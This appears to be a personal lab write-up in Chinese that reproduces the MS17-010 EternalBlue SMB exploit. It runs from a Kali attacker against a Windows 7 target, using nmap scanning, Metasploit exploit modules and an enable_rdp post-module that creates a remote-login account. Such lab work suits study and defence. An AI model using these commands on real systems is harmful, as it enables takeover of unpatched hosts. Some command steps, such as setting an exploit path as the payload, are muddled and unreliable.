这是一个有点“古老”但是却非常经典的实验因而特生成文档简单记录个人的一次实操流程。一、实验背景MS17-010是由Microsoft在2017年发布的一个重要安全补丁其主要修复的是Windows系统中SMB协议存在的一系列高危漏洞。其中最典型的是CVE-2017-0144。该漏洞指允许攻击者在未经过身份验证的情况下通过构造特制的网络数据包远程执行任意代码从而完全控制目标主机。二、影响范围MS17-010主要影响的是启用了SMBv1协议的Windows系统如Windows7、Windows Server2008等等影响范围较广。其主要危害点在于SMB协议通常应用与局域网内文件传输所以一台未打补丁修复的主机就可能导致大面积其余主机“沦陷”。因而这是非常典型的一个高危远程代码执行漏洞案例。三、实验准备攻击机kali、靶机Win7开始实验前确保双机网络ping通,Win7靶机的防火墙记得关闭。四、实验过程1.漏洞存在性确认可以利用Nmap对靶机进行一次漏洞扫描确认漏洞存在的真实性。nmap --script vuln -T4 靶机IP确认靶机的445端口处于开放状态。对445端口的补充该端口服务主要用于SMB协议访问共享文件、共享打印机等工作依赖该端口进行此时可以看到靶机存在安全风险2.开启msfconsole模块search ms17-010根据实验靶机的系统版本选择对应的攻击模块本实验选择第二模块use 2使用auxiliary模块检测漏洞use auxiliary/scanner/smb/smb_ms17_010设置要扫描的靶机IPset rhost 靶机IP再次确认漏洞存在主机存活开始对靶机目标的主机系统提权操作选择攻击载荷use 2配置攻击参数set payload exploit/windows/smb/ms17-010_eternalblue / set payload 2set rhost 靶机IPrun此时获得了靶机的控制权3.开启目标主机远程桌面服务暂时将Meterpreter会话放置于后台随后创建远程桌面用户的用户名与密码use post/windows/manage/enable_rdpset password 密码set username 用户名设置为后台的Meterpreter会话set session 1运行run获得靶机靶机远程登陆控制权至此本实验结束。